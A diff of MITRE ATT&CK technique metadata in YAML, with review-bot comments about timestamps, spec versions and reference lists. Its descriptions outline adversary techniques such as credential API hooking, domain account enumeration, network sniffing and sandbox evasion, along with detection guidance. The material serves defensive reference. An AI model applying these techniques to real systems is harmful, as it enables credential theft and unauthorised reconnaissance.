object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- created: '2020-02-11T19:01:15.930Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-27T21:03:56.385Z'
name: 'Input Capture: Credential API Hooking'
description: |
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
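Review bot: this hunk deletes the entire `external_references` list of T1056.004 (all 14 entries from `Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017` to `StackExchange Hooks Jul 2012`) while the description on the last context line still cites `(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)`. The list is re-emitted further down the same object, so this is a key reorder rather than a data loss, but every `(Citation: ...)` key used in `description` and `x_mitre_detection` should be checked against the re-added `source_name` values before merge.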
@@ -53755,28 +54409,94 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ created: '2020-02-11T19:01:15.930Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - source_name: Microsoft Hook Overview
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1056.004
atomic_tests: []
T1552.007:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:25:28.820Z'
name: Kubernetes List Secrets
description: "Adversaries may gather credentials via APIs within a containers
environment. APIs in these environments, such as the Docker API and Kubernetes
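Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM) is removed from T1056.004 at `- x_mitre_permissions_required:` and never re-added in the new object, while `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0 and `x_mitre_version` from 1.0 to 1.1. Other techniques in this diff keep that key as unchanged context (T1556.004, T1016.001), so confirm the drop reflects the upstream object rather than a serializer omission. The reordered reference list itself carries the same 14 entries, with `revoked: false` and `x_mitre_deprecated: false` added.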
@@ -53833,9 +54553,8 @@ credential-access:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.007
atomic_tests: []
T1556.004:
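Review bot: `spec_version: '2.1'` is dropped here and from every other technique object in this diff. `spec_version` is a required common property on STIX 2.1 objects, so anything downstream that re-exports these blocks as STIX will need to reinsert it; the removal is only safe if the technique block is treated as an internal YAML mirror. Worth a line in the PR description either way.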
@@ -53866,7 +54585,7 @@ credential-access:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
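Review bot: `modified` for T1556.004 moves backward, from 2022-05-11 to 2021-12-14. The old value's `14:00:00.188Z` time component recurs on many objects in this diff (`2023-05-09T14:00:00.188Z`, `2022-04-25T14:00:00.188Z`), which looks like a batch-import timestamp rather than the upstream one; if so this is a correction, but confirm it against the ATT&CK object, because a consumer that uses `modified` for change detection will otherwise read it as a rollback.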
@@ -53890,8 +54609,6 @@ credential-access:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
discovery:
T1033:
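Review bot: T1556.004 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with no replacement `x_mitre_attack_spec_version` added, unlike the objects above that receive 3.2.0; T1016.001 gets the same treatment further down. If the upstream object at the new `modified` date still carries an attack spec version, it is being lost here.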
@@ -53956,7 +54673,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1033
atomic_tests:
- name: System Owner/User Discovery
@@ -53976,7 +54692,7 @@ discovery:
name: sh
T1613:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:08:50.706Z'
name: Container and Resource Discovery
description: "Adversaries may attempt to discover containers and other resources
that are available within a containers environment. Other resources may include
@@ -54035,7 +54751,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1613
atomic_tests: []
T1016.001:
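Review bot: T1613 keeps `x_mitre_attack_spec_version: 3.1.0` while its neighbours are bumped to 3.2.0, and its `modified` goes back to 2023-04-15. That is consistent with an upstream object untouched since then, but the mix of 3.1.0 and 3.2.0 across the file should be stated as expected in the PR so it is not flagged as a partial update.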
@@ -54056,7 +54771,7 @@ discovery:
- source_name: mitre-attack
external_id: T1016.001
url: https://attack.mitre.org/techniques/T1016/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-25T17:03:26.632Z'
name: 'System Network Configuration Discovery: Internet Connection Discovery'
description: |-
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert
, and GET requests to websites.
@@ -54077,8 +54792,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1016.001
atomic_tests:
- name: Check internet connection using ping freebsd, linux or macos
@@ -54103,7 +54816,7 @@ discovery:
'
T1069:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:03:06.294Z'
name: Permission Groups Discovery
description: |-
Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -54126,15 +54839,14 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Group: Group Metadata'
@@ -54160,13 +54872,12 @@ discovery:
url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1069.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:51:35.759Z'
name: Cloud Groups
description: |-
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -54191,12 +54902,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -54238,13 +54948,12 @@ discovery:
url: https://github.com/True-Demon/raindance
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1615:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-01-06T12:41:08.579Z'
name: Group Policy Discovery
description: |-
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -54305,12 +55014,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1615
atomic_tests: []
T1652:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:07:16.804Z'
name: Device Driver Discovery
description: |-
Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -54374,19 +55082,18 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1652
atomic_tests: []
T1087.002:
technique:
- modified: '2024-04-15T21:33:57.732Z'
+ modified: '2024-05-31T04:00:37.651Z'
name: 'Account Discovery: Domain Account'
description: "Adversaries may attempt to get a listing of domain accounts. This
information can help adversaries determine which domain accounts exist to
aid in follow-on behavior such as targeting specific accounts which possess
particular privileges.\n\nCommands such as net user /domain
and
net group /domain
of the [Net](https://attack.mitre.org/software/S0039)
- utility, dscacheutil -q group
on macOS, and ldapsearch
+ utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
cmdlets including Get-ADUser
and Get-ADGroupMember
may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
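Review bot: the `-`/`+` pair for `utility, dscacheutil -q group` / `on macOS, and ldapsearch` in the T1087.002 description is identical as rendered, so the change is whitespace or an invisible character (trailing space, NBSP, or a backtick lost in extraction). Confirm it is an intentional normalisation from the generator rather than noise, since it makes the description look modified when only the `modified` date has changed.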
@@ -54433,7 +55140,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.002
atomic_tests: []
T1087.001:
@@ -54500,7 +55206,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.001
atomic_tests:
- name: View sudoers access
@@ -54600,7 +55305,7 @@ discovery:
name: sh
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -54690,13 +55395,12 @@ discovery:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests:
- name: Detect Virtualization Environment (MacOS)
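Review bot: the updated `Deloitte Environment Awareness` URL appends `/edit`, which for a Google Drive file is the editor view and may prompt for sign-in or edit rights instead of serving the public view. Check that the link resolves for an anonymous reader and that the same reference on T1497.003, which still uses the old URL without `/edit` elsewhere in this diff, is updated consistently.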
@@ -54718,7 +55422,7 @@ discovery:
'
T1069.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:16:47.754Z'
name: 'Permission Groups Discovery: Domain Groups'
description: |-
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -54761,12 +55465,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.002
atomic_tests: []
T1007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:55:18.326Z'
name: System Service Discovery
description: |-
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query
, tasklist /svc
, systemctl --type=service
, and net start
.
@@ -54807,12 +55510,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1007
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -54897,7 +55599,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests:
- name: Packet Capture macOS using tcpdump or tshark
@@ -55070,7 +55771,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1135
atomic_tests:
- name: Network Share Discovery
@@ -55093,7 +55793,7 @@ discovery:
name: sh
T1120:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:41.575Z'
name: Peripheral Device Discovery
description: 'Adversaries may attempt to gather information about attached peripheral
devices and components connected to a computer system.(Citation: Peripheral
@@ -55144,12 +55844,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1120
atomic_tests: []
T1082:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:42:22.247Z'
name: System Information Discovery
description: |-
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -55160,7 +55859,6 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Maril Vernon @shewhohacks
- Praetorian
@@ -55175,7 +55873,6 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- IaaS
@@ -55223,7 +55920,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1082
atomic_tests:
- name: System Information Discovery
@@ -55384,12 +56082,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:22:56.372Z'
name: Application Window Discovery
description: |-
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -55431,122 +56128,73 @@ discovery:
- source_name: Prevailion DarkWatchman 2021
description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
new evolution in fileless techniques. Retrieved January 10, 2022.'
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1010
atomic_tests: []
T1087.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
- type: attack-pattern
- created: '2020-02-21T21:08:33.237Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.003
- url: https://attack.mitre.org/techniques/T1087/003
- - source_name: Microsoft Exchange Address Lists
- url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
- description: Microsoft. (2020, February 7). Address lists in Exchange Server.
- Retrieved March 26, 2020.
- - source_name: Microsoft getglobaladdresslist
- url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
- description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
- 2019.
- - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
- Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
- source_name: Black Hills Attacking Exchange MailSniper, 2016
- - source_name: Google Workspace Global Access List
- url: https://support.google.com/a/answer/166870?hl=en
- description: Google. (n.d.). Retrieved March 16, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-17T20:35:35.125Z'
name: Email Account
description: |-
Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
- In on-premises Exchange and Exchange Online, theGet-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+ In on-premises Exchange and Exchange Online, the Get-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
kill_chain_phases:
